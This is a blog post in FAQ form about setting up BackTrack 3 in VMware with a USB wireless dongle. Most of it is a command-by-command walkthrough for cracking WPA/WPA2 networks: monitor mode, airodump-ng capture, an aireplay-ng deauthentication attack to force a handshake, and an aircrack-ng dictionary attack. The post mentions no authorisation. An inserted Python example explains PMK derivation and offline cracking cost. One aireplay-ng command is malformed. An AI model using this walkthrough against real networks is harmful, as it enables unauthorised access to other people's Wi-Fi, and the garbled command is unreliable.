BT3 in VMware does not have internet connectivity. What should I do?
VMware itself has limitations on passing through internal/external devices such as PCMCIA/PCI/PCI-Express cards, but it does allow USB devices to be attached. Therefore, get yourself a USB dongle that lets the guest connect to the net. There are many USB dongle models that work on BT3; I chose the Alfa Network AWUS036H (RTL8187L) and the Linksys WUSB54GC (RT73). In this post, I will show an example of how to use a Linksys WUSB54GC card with BT3.
How do I connect the Linksys WUSB54GC to my BT3 in VMware?
VMware will not automatically connect any external device. To begin, boot BT3 completely, then plug the Linksys WUSB54GC into a USB port. Now click the VMware menu VM > Removable Devices > USB Devices > Linksys USB Device (Port 1). You are now ready to use the device and connect to the internet without installing any drivers for it; the WUSB54GC works out of the box in BT3.
How do I make sure that the device is connected?
Open a shell konsole in BT3, type ifconfig -a, and you should see rausb0 for the Linksys WUSB54GC (if you are using the Alfa AWUS036H, you should see wlan0):

Is it possible to crack wireless connections with the Linksys WUSB54GC, and how do I start?
Absolutely. To begin, we have to get some updates for the driver (the Linksys WUSB54GC uses the Ralink RT73 chipset) and for the BT3 kernel. Open a shell konsole and type
bt ~ # wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-3.0.1.tar.bz2
bt ~ # wget http://www.offensive-security.com/kernel.lzm
You should see this:

You may also get drivers for other USB dongle models at http://homepages.tu-darmstadt.de/~p_larbig/wlan/
Note that the driver version is 3.0.1 and the archive is a *.bz2 file. We need to extract it; on the same konsole, type
bt ~ # tar -xvjf rt73-k2wrlz-3.0.1.tar.bz2
bt ~ # ifconfig rausb0 down
bt ~ # lzm2dir kernel.lzm /
After that, navigate to the extracted files by typing
bt ~ # cd rt73-k2wrlz-3.0.1/Module
bt Module # make
bt Module # make install
bt Module # cd
bt ~ # modprobe rt73
bt ~ # ifconfig rausb0 up
Now we are ready to crack a wireless network within range. In this example, we are trying to crack WPA/WPA2 networks. Continue with
bt ~ # iwconfig rausb0 mode monitor rate 1M
bt ~ # iwconfig
Up to here, you will see rausb0 with Bit Rate=1Mb/s. Continue with
bt ~ # iwpriv forceprism 1
forceprism no private ioctls
bt ~ # iwpriv rausb0 forceprism 1
bt ~ # iwpriv rausb0 rfmontx 1
bt ~ # airodump-ng rausb0

Then press CTRL+C to stop. Now we have an AP with the ESSID home and the MAC address 00:1D:7E:64:88:B5 on channel 11, so in a new konsole we type
bt ~ # airodump-ng -c 11 -w /tmp/dmp rausb0
Now wait 10 seconds to make sure WPA handshake appears at the top right of the konsole. If it does not appear, follow step (1) and then step (2); if it does appear, follow step (2) and skip step (1).
Step (1):
Open a new shell konsole and type
bt ~ # aireplay-ng 0 -5 -a 00:1D:7E:64:88:B5 rausb0
Here 00:1D:7E:64:88:B5 is the AP MAC address. As this command runs, notice that the first konsole shows WPA handshake at the top right.
Step (2):
Now that we have our WPA handshake, press CTRL+C. For WPA/WPA2 cracking, the number of captured packets does not matter. Open a new konsole and type
bt ~ # aircrack-ng -w mangled.lst -b 00:1D:7E:64:88:B5 /tmp/dmp-01.cap
mangled.lst is a dictionary file and could be any name depending on your dictionary file; 00:1D:7E:64:88:B5 is the AP MAC address. You should see a calculating window once you execute this command, as in the image below:

Is there any difference between WPA and WPA2 cracking?
No. The same method of cracking applies to both types of encryption.
Should I stop the cracking calculation if the AP is off?
No, because we are cracking offline. You may continue until the key is obtained.
Do you have a video approach to cracking WEP/WPA?
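Why the calculation can keep running with the AP switched off, as an added example that is not part of the original post: WPA/WPA2-PSK derives the Pairwise Master Key (PMK) from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations, 32 bytes), and the captured handshake is all that is needed to check a candidate, so no further traffic is required. The test vector (passphrase "password", SSID "IEEE") is the one published in IEEE 802.11i Annex H; the candidate list and the SSID "home" used for timing are constructed here.

```python
import hashlib
import time

PBKDF2_ITERATIONS = 4096   # fixed by the WPA/WPA2-PSK specification
PMK_LENGTH = 32            # bytes


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2-PSK Pairwise Master Key.

    PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The SSID is the salt, so the same passphrase on two networks with
    different SSIDs gives two unrelated PMKs.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"),
                               PBKDF2_ITERATIONS, PMK_LENGTH)


def pmk_depends_on_ssid(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when one passphrase yields different PMKs for two SSIDs.

    This is why a non-default SSID defeats tables precomputed for common
    SSIDs: every SSID forces a fresh PBKDF2 run per candidate.
    """
    return wpa_pmk(passphrase, ssid_a) != wpa_pmk(passphrase, ssid_b)


def derivations_per_second(ssid: str, candidates: int = 50) -> float:
    """Measure how many PMK derivations this host performs per second.

    The cost per candidate is fixed by the 4096 iterations, so the work an
    offline dictionary run must do grows linearly with the number of
    candidates; a long, non-dictionary passphrase pushes that number out of
    reach. The candidate list is constructed for the measurement.
    """
    constructed = [f"candidate{i:04d}" for i in range(candidates)]
    start = time.perf_counter()
    for candidate in constructed:
        wpa_pmk(candidate, ssid)
    return candidates / (time.perf_counter() - start)


if __name__ == "__main__":
    # IEEE 802.11i Annex H.4.1 test vector:
    # f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e
    print(wpa_pmk("password", "IEEE").hex())
    print(pmk_depends_on_ssid("password", "IEEE", "home"))
    print(f"{derivations_per_second('home'):.0f} PMK derivations/s on this host")
```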
Yep, you may download some of my vids HERE.

2 comments:
25 November, 2010 03:58
"all scenario here is applied in VMware Workstation in F80S"
what is F80S???
22 December, 2010 01:33
Hi there, F80S is an Asus laptop model. I found that there is a problem having a dual installation of BT on an Asus F80S laptop. Anyway, by using VMware, you no longer require a dual-boot setup to run BT. By using VMware, everything is easy. This post is from an old BT series on how to crack wireless with the WUSB54GC USB dongle. There was an issue at that time; everything is quite automatic in the latest series of BT right now.